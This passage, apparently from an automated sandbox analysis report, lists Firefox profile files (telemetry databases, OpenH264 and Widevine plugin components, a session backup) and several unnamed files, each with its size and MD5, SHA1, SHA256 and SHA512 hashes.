SHA256d064ba1cdaef9100b17763502bf47b74154d7e84d54bb670dad223662bc692db
SHA51268f97574f10c0ea0bebfca0491465c527f9be3bf2009fd2250ffd5b3fcbbc63f13c6865b1120ae00f0165a485aeb75751733c090111103385ab73f4fad89954b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\db\data.safe.bin
Filesize9KB
MD522a4c5b0ff882ed286b5975d76ce79ab
SHA1e40b7c8f1aa854cd94faef61475a8b6557b0a515
SHA256aabf4ff1e47afdba2297adfec2964eacc8df4ed4284b632a31d01c804525d39b
SHA5127a8c686c1499160104b3b734e27ffec431784ec844a40d767da69544ca5715a063205ca396c56274713ab2129804f97f975f4558597f8032ad84e6189f2cf0de
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\pending_pings\f6d7e13b-c513-4a15-99f8-bb3595756f76
Filesize733B
MD59d8ab06b16213e0edcec0255a0c0f5bc
SHA17f24addc30cfea05d5510649808ece24f2c6f4d4
SHA2560439684017e5f8a751a94b5754fdbc43260a07ee445ad7be6d94d094ceb13729
SHA512463dcd7e9e08eece16bf96bd78537e29a671d78ab132ce2884aa7fd61831cec2e8b09f6a74e8db7f486c92817a27fb0985a4b081bd048d3df3ea38bcf5f6acf0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD559510cd7830ea59ba74747ebe788a7c3
SHA1483bfa7273de3addff139ba66aef93d5018b6df9
SHA2560fe96e816f37115cba5482dd246e3ff1f34b700f0456bbe4d435e0a2dfd9df79
SHA51218633a4894059951350ff0ce8d234643387e9f02bee3b2fe73c7f24ee23f2d1e7661391ac2e7131c5bffad10b855b448e460b4a012e5fbb4cfdd4607bb29dbdb
-
Filesize
7KB
MD52269b6493a065fcf485588d058d316fa
SHA108dd7de8c9676f72850db06a5e7177410dedd12a
SHA256d3cc653adb29880d70cad97390c072c63fc9e16a552fcf0a21c93b641dd91af3
SHA5125415031dcf7cff0be02c7c98a3bbd1a39e354523c8adb0883b824ef7bfe77900582f3978ceb7ecebf07d932771efd22046e97a0fe6a4c619b03cfdd4e171b3f8
-
Filesize
6KB
MD515aae9924715792740651d1e26c8fd3f
SHA178b922a6e1fe7a0fa823c011e7ae34ec0765756a
SHA2569f8a36ae03301c85070fa48cc21d814b56774f4629c5957c65647c02fe23aa7d
SHA51241cf2801ac5cfd3a5fe31cd4d96d8dff3b214dc7d53945669cb82aca23228fc06edbe41209755437da880b95ca455f078988d2e5b5f263627bd9826ea041108c
-
Filesize
6KB
MD549ff8c4daf47ee308b6e4ed808bc3f51
SHA1c42691a6176b1da3bf815d7189522d0f7ebdd795
SHA2565dc568174cd6fa73580d10e8b4e5928af5aab060aadb11470bab9c4d2368f24d
SHA512e8521720327cdb8699504eb75fb0608a9097ecabb170664b591df85936395384512064cb6749d6b0524e89c733ccac10f941e6b6e6617d01d618bc22e119fc08
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5e89dbefbd4989e16e158c155862ba2e0
SHA1ee1ebf917a4348801f8268fcd562e4d0acde853c
SHA256b75a789004120aee974e314ed98eca51bc8f5a532f9018882087f7e269a72166
SHA512143060e32f975c491f0efa14f53480808408937f4e86cacf12588b6eff4f8fb32164018f273099a61f9d21f8f6683d119e60486636c4c06d50fb944ebda98512
-
Filesize
3.1MB
MD5ca0f8493d787c9f2d97d00c245143f41
SHA16ebb479b6c871e48ab97d2784b9e61fd2da1b55b
SHA2569e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229
SHA51274999928fc8a11b4963180e2647d93dad68d5f25388a1dde4e9aed94bf3e3cbca9710275ebfc0c468c9071c0f4f0302f73bfcf5c65d1b1334520ac68fed21fc3